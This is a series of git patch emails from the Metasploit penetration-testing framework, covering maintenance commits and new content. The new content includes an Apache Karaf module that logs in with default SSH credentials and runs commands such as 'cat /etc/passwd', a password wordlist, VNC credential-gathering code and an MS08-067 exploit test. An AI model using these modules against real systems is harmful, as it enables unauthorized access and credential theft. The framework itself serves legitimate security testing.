'boot' end + Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| + t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. + t.fork = true # You may get faster startup if you set this to false + t.profile = 'exploit' + end + end rescue LoadError From 93979b746062e517716a8c275cd650e2641d4923 Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Thu, 4 Feb 2016 13:37:36 -0600 Subject: [PATCH 294/686] updating ms08067 --- features/modules/exploit/smb/ms08_067_netapi.feature | 10 +++++----- features/step_definitions/targets.rb | 10 ---------- 2 files changed, 5 insertions(+), 15 deletions(-) delete mode 100644 features/step_definitions/targets.rb diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index 9a9cf04ddf..6647c7083a 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -8,19 +8,19 @@ Feature: MS08-067 netapi Scenario: The MS08-067 should get a session with bind_tcp Given I ready the windows targets - And a file named "ms08-067.rc" with: + Given a file named "ms08-067-bind.rc" with: """ <ruby> hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') self.run_single('use exploit/windows/smb/ms08_067_netapi') self.run_single('set payload windows/meterpreter/bind_tcp') hosts['windows'].each do |host| - self.run_single("set RHOST #{host['ip']}") + self.run_single("set RHOST #{host['ipAddress']}") self.run_single('run') sleep 1 end - </ruby> """ - When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` - Then the output should contain "[*] Exploit completed, 1 session was created." + When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` + Then the 'Mdm::Host' table contains the targets from 'features/support/targets.yml' + \ No newline at end of file diff --git a/features/step_definitions/targets.rb b/features/step_definitions/targets.rb deleted file mode 100644 index 7c14393d0e..0000000000 --- a/features/step_definitions/targets.rb +++ /dev/null @@ -1,10 +0,0 @@ -When /^targets are loaded$/ do - config_file = File.expand_path('features/support/targets.yml') - fail "Target config file #{config_file} does not exist" unless File.exists?(config_file) - @target_config = YAML.load_file(config_file) -end - -When /^(RHOSTS?) (?:are|is) (\S+)$/ do |type, target_type| - fail "No target type #{target_type}" unless @target_config.key?(target_type) - step "I type \"set #{type} #{@target_config[target_type]}\"" -end From 75febfdde0925c26222d4c6d9f7d54b4ee9e92b7 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Tue, 9 Feb 2016 16:43:11 -0600 Subject: [PATCH 295/686] Move @hdm to the former employees section :') --- .mailmap | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.mailmap b/.mailmap index 6c8351c4ef..3dafb94713 100644 --- a/.mailmap +++ b/.mailmap @@ -16,9 +16,6 @@ ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com> farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com> gmikeska-r7 <gmikeska-r7@github> Greg Mikeska <greg_mikeska@rapid7.com> gmikeska-r7 <gmikeska-r7@github> Gregory Mikeska <greg_mikeska@rapid7.com> -hdm <hdm@github> HD Moore <hd_moore@rapid7.com> -hdm <hdm@github> HD Moore <hdm@digitaloffense.net> -hdm <hdm@github> HD Moore <x@hdm.io> jhart-r7 <jhart-r7@github> Jon Hart <jon_hart@rapid7.com> jlee-r7 <jlee-r7@github> <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> <james_lee@rapid7.com> @@ -86,6 +83,9 @@ g0tmi1k <g0tmi1k@github> <g0tmi1k@users.noreply.github.com> g0tmi1k <g0tmi1k@github> <have.you.g0tmi1k@gmail.com> h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com> h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com> +hdm <hdm@github> HD Moore <hd_moore@rapid7.com> +hdm <hdm@github> HD Moore <hdm@digitaloffense.net> +hdm <hdm@github> HD Moore <x@hdm.io> jabra <jabra@github> Josh Abraham <jabra@spl0it.org> jabra <jabra@github> Joshua Abraham <jabra@spl0it.org> jcran <jcran@github> <jcran@0x0e.org> From 7fe61dce70c64812ceb36b6dfe40e20abe840320 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Tue, 9 Feb 2016 17:01:19 -0600 Subject: [PATCH 296/686] added support for GITHUB_OAUTH_TOKEN --- tools/modules/file_pull_requests.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb index b2791443e5..144078fbe5 100755 --- a/tools/modules/file_pull_requests.rb +++ b/tools/modules/file_pull_requests.rb @@ -159,6 +159,9 @@ module FilePullRequestCollector Usage Example: #{__FILE__} -k KEY -f modules/exploits/windows/browser/ms13_069_caret.rb + or + export GITHUB_OAUTH_TOKEN=KEY + #{__FILE__} -f modules/exploits/windows/browser/ms13_069_caret.rb How to obtain an API key (access token): 1. Go to github.com. @@ -204,7 +207,7 @@ module FilePullRequestCollector end if options.empty? - puts "No options specified, try -h for usage" + puts "No options specified, try -h for usage" exit end @@ -222,6 +225,17 @@ if __FILE__ == $PROGRAM_NAME exit end + if !opts.has_key?(:api_key) + if !ENV.has_key?('GITHUB_OAUTH_TOKEN') + puts + puts "A Github Access Token must be specified to use this tool" + puts "Please set GITHUB_OAUTH_TOKEN or specify the -k option" + exit + else + opts[:api_key] = ENV['GITHUB_OAUTH_TOKEN'] + end + end + begin cli = FilePullRequestCollector::Client.new(opts[:api_key]) cli.search(opts[:file]) From 240cbb91be13c5de73ec37ba022f2bba30ccdab9 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Tue, 9 Feb 2016 17:12:09 -0600 Subject: [PATCH 297/686] s/resp/res/ --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 2b3c052717..af4ed269af 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -208,24 +208,24 @@ class Metasploit3 < Msf::Auxiliary post_params['group_list'] = group unless group.empty? - resp = send_request_cgi( - 'uri' => '/+webvpn+/index.html', - 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => cookie, - 'vars_post' => post_params - ) + res = send_request_cgi( + 'uri' => '/+webvpn+/index.html', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => cookie, + 'vars_post' => post_params + ) - if resp && - resp.code == 200 && - resp.body.match(/SSL VPN Service/) && - resp.body.match(/webvpn_logout/i) + if res && + res.code == 200 && + res.body.match(/SSL VPN Service/) && + res.body.match(/webvpn_logout/i) print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") - do_logout(resp.get_cookies) + do_logout(res.get_cookies) - report_cred(ip: rhost, port: rport, user: user, password: pass, proof: resp.body) + report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}") return :next_user From 08a41b0a31e1e1ccb420270ee35bded5c9894cc0 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Tue, 9 Feb 2016 21:22:50 -0600 Subject: [PATCH 298/686] Fix issue when target PID not owned by session --- modules/post/windows/manage/priv_migrate.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 04cba5d6c3..dcf5fbc9ec 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Post end # This function returns the first process id of a process with the name provided. + # It will make sure that the process has a visible user meaning that the session has rights to that process. # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module. # # @return [Fixnum] the PID if one is found @@ -60,7 +61,9 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - return proc['pid'] if proc['name'] == proc_name + if proc['name'] == proc_name + return proc['pid'] if proc['user'] != "" + end end return nil end From 4653c271672cd54c76d6db9e187ec466393447c2 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Tue, 9 Feb 2016 21:24:40 -0600 Subject: [PATCH 299/686] Fix minor grammar error in description --- modules/post/windows/manage/priv_migrate.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index dcf5fbc9ec..1d26ad292d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post It will do everything it can to migrate, including spawing a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe. - If al these fail, it will fall back to User level migration. For sessions with User level rights: + If all these fail, it will fall back to User level migration. For sessions with User level rights: It will try to migrate to a user level process, if that fails it will attempt to spawn the process then migrate to it. It will attempt the User level processes in the following order: NAME (if specified), explorer.exe, then notepad.exe.}, From 8a3bc83c4de2fb94c100966e4794a591f04208a7 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 9 Feb 2016 21:24:25 -0600 Subject: [PATCH 300/686] Resolve #6553, remove unnecessary content-length header Rex will always generate a content-length header, so the module doesn't have to do this anymore. Resolve #6553 --- modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 1 - modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 882ea4523a..5b04429e57 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -121,7 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'max-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 17dc37c388..5a5e8f9e58 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'mag-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) From a93f200851207772fb0b2daf7ed124686952b878 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Wed, 10 Feb 2016 07:51:13 +0000 Subject: [PATCH 301/686] cosmetic fixes --- modules/post/multi/manage/set_wallpaper.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index 8e477a1a42..daf8cf0b58 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -14,11 +14,11 @@ class Metasploit3 < Msf::Post super( update_info( info, 'Name' => 'Multi Manage Set Wallpaper', 'Description' => %q{ - This module will sets the desktop wallpaper background on the specified session + This module will sets the desktop wallpaper background on the specified session. }, 'License' => MSF_LICENSE, 'Author' => [ 'timwr'], - 'Platform' => [ 'win', 'osx', 'linux' ], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Post def run file = datastore['WALLPAPER_FILE'] if set_wallpaper(file) - print_good("#{peer} - The video has started") + print_good("#{peer} - The wallpaper has been set") else - print_error("#{peer} - Unable to start the video") + print_error("#{peer} - Unable to set the wallpaper") return end From c67360f4362a3c3dd09476649942dd92c716b937 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 10 Feb 2016 09:44:01 -0600 Subject: [PATCH 302/686] Remove extraneous whitespace --- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 22ac86212d..a715ed69ab 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) register_advanced_options([ - OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) ], self.class) end From 51604fa24a5943d9ae99ebd626d3a90093ed2dc7 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 10:59:11 -0600 Subject: [PATCH 303/686] made necessary inheritance changes --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 57fbd58292..c88a13acf7 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -5,10 +5,11 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit4 < Msf::Auxiliary Rank = GoodRanking include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos def initialize(info={}) super(update_info(info, @@ -72,7 +73,7 @@ class Metasploit4 < Msf::Exploit::Remote return pkt end - def exploit + def run ip = datastore['RHOST'] port = datastore['RPORT'] From 62dd82e65389bf28d01067c8a598fcae583c6c01 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Wed, 10 Feb 2016 11:24:45 -0600 Subject: [PATCH 304/686] Make fix easier to read --- modules/post/windows/manage/priv_migrate.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 1d26ad292d..45d2de743d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -61,8 +61,8 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - if proc['name'] == proc_name - return proc['pid'] if proc['user'] != "" + if proc['name'] == proc_name && proc['user'] != "" + return proc['pid'] end end return nil From 72f5a33804fa266bf4b0d0de1dce07b8609582f0 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:34:05 -0600 Subject: [PATCH 305/686] addressed CI errors --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 17 +---------------- 1 file changed, 1 insertion(+), 16 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index c88a13acf7..eda0f99700 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -28,22 +28,7 @@ class Metasploit4 < Msf::Auxiliary [ ['URL', 'https://www.exploit-db.com/exploits/38979/'] ], - 'Payload' => - { - 'BadChars' => "\x00", - }, - 'DefaultOptions' => - { - 'DisablePayloadHandler' => 'true', - }, - 'Platform' => 'win', - 'Targets' => - [ - ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}], - ], - 'Privileged' => false, - 'DisclosureDate' => "Dec 15 2015", - 'DefaultTarget' => 0)) + 'DisclosureDate' => "Dec 15 2015")) register_options( [ From 4c6cb03548a4ba3a890f94565cc57888b4ec414c Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:40:21 -0600 Subject: [PATCH 306/686] more build errors --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index eda0f99700..3d1443e452 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -28,7 +28,9 @@ class Metasploit4 < Msf::Auxiliary [ ['URL', 'https://www.exploit-db.com/exploits/38979/'] ], - 'DisclosureDate' => "Dec 15 2015")) + 'DisclosureDate' => "Dec 15 2015", + 'DefaultOptions' => {} + )) register_options( [ From c874699b8239105f855a6f011d5e45a89c045590 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:45:09 -0600 Subject: [PATCH 307/686] removed ranking --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 3d1443e452..6d0fc435e0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -6,7 +6,6 @@ require 'msf/core' class Metasploit4 < Msf::Auxiliary - Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos From 1637891ece730168dfb0d3e55d8c363c1a90c700 Mon Sep 17 00:00:00 2001 From: nk <nk@nikaiw.io> Date: Wed, 10 Feb 2016 20:30:41 +0100 Subject: [PATCH 308/686] Add check for the uninstall location in vnc post module --- modules/post/windows/gather/credentials/vnc.rb | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index a4488e672e..376de77802 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -108,6 +108,20 @@ class Metasploit3 < Msf::Post :port_variable => 'PortNumber='} end + #check uninstall key + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") + open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + vnclocation = open_key.query_value("InstallLocation").data + locations << {:name => 'UltraVNC', + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + rescue + # Registry value not found + end + locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', :pass_variable => 'Password', From 8118198628d739e86d543fca1b6a0ea0045a02ee Mon Sep 17 00:00:00 2001 From: Nicolas Devillers <nk@nikaiw.io> Date: Wed, 10 Feb 2016 22:47:51 +0100 Subject: [PATCH 309/686] Add vprint of the exception message --- modules/post/windows/gather/credentials/vnc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 376de77802..040a6a436c 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Post :pass_variable => 'passwd=', :viewonly_variable => 'passwd2=', :port_variable => 'PortNumber='} - rescue - # Registry value not found + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) end locations << {:name => 'WinVNC3_HKLM', From cdaa2a8c432dc77760461d2029265b9a1e7c2438 Mon Sep 17 00:00:00 2001 From: Nicholas Starke <starke.nicholas@gmail.com> Date: Wed, 10 Feb 2016 16:48:08 -0600 Subject: [PATCH 310/686] Adding Apache Karaf Command Execution Module This module establishes an SSH session using default credentials and then executes a user defined operating system command. This is part of GitHub Issue #4358. --- .../gather/apache_karaf_command_execution.rb | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 modules/auxiliary/gather/apache_karaf_command_execution.rb diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..f04817528c --- /dev/null +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke <nick@alephvoid.com>' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end From aeb1d80e0d703b1e5baa2d06ce841542c0f8bd5e Mon Sep 17 00:00:00 2001 From: Jay Turla <shipcodez@gmail.com> Date: Thu, 11 Feb 2016 08:55:45 +0800 Subject: [PATCH 311/686] Adding top 100 adobe passwords --- data/wordlists/adobe_top100_pass.txt | 100 +++++++++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 data/wordlists/adobe_top100_pass.txt diff --git a/data/wordlists/adobe_top100_pass.txt b/data/wordlists/adobe_top100_pass.txt new file mode 100644 index 0000000000..f7d2a744be --- /dev/null +++ b/data/wordlists/adobe_top100_pass.txt @@ -0,0 +1,100 @@ +123456 +123456789 +password +adobe123 +12345678 +qwerty +1234567 +111111 +photoshop +123123 +1234567890 +000000 +abc123 +1234 +adobe1 +macromedia +azerty +iloveyou +aaaaaa +654321 +12345 +666666 +sunshine +123321 +letmein +monkey +asdfgh +password1 +shadow +princess +dragon +adobeadobe +daniel +computer +michael +121212 +charlie +master +superman +qwertyuiop +112233 +asdfasdf +jessica +1q2w3e4r +welcome +1qaz2wsx +987654321 +fdsa +753951 +chocolate +fuckyou +soccer +tigger +asdasd +thomas +asdfghjkl +internet +michelle +football +123qwe +zxcvbnm +dreamweaver +7777777 +maggie +qazwsx +baseball +jennifer +jordan +abcd1234 +trustno1 +buster +555555 +liverpool +abc +whatever +11111111 +102030 +123123123 +andrea +pepper +nicole +killer +abcdef +hannah +test +alexander +andrew +222222 +joshua +freedom +samsung +asdfghj +purple +ginger +123654 +matrix +secret +summer +1q2w3e +snoopy1 From 4ac7c5e298d76bc36f84d352434b581ec5dbe993 Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Thu, 11 Feb 2016 14:36:17 +1000 Subject: [PATCH 312/686] Updaed the gemspec to point to the new payloads gem --- metasploit-framework.gemspec | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 60143d3550..32bcb1cd36 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.23' + spec.add_runtime_dependency 'metasploit-payloads', '1.0.24' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 27ec6a861c3ce34c06c4921139ab464d59cf0af8 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 22:41:41 -0600 Subject: [PATCH 313/686] update gemfile.lock --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index caab021834..ea2654ff4a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.23) + metasploit-payloads (= 1.0.24) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.23) + metasploit-payloads (1.0.24) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) From ff1cb4a2a46091c772b13d0715be00c9f994342e Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 22:44:17 -0600 Subject: [PATCH 314/686] update payload sizes --- modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- 15 files changed, 15 insertions(+), 15 deletions(-) diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index fff36fc4d5..df54d255cd 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit4 - CachedSize = 26205 + CachedSize = 26778 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 395962145f..9d61027eca 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -12,7 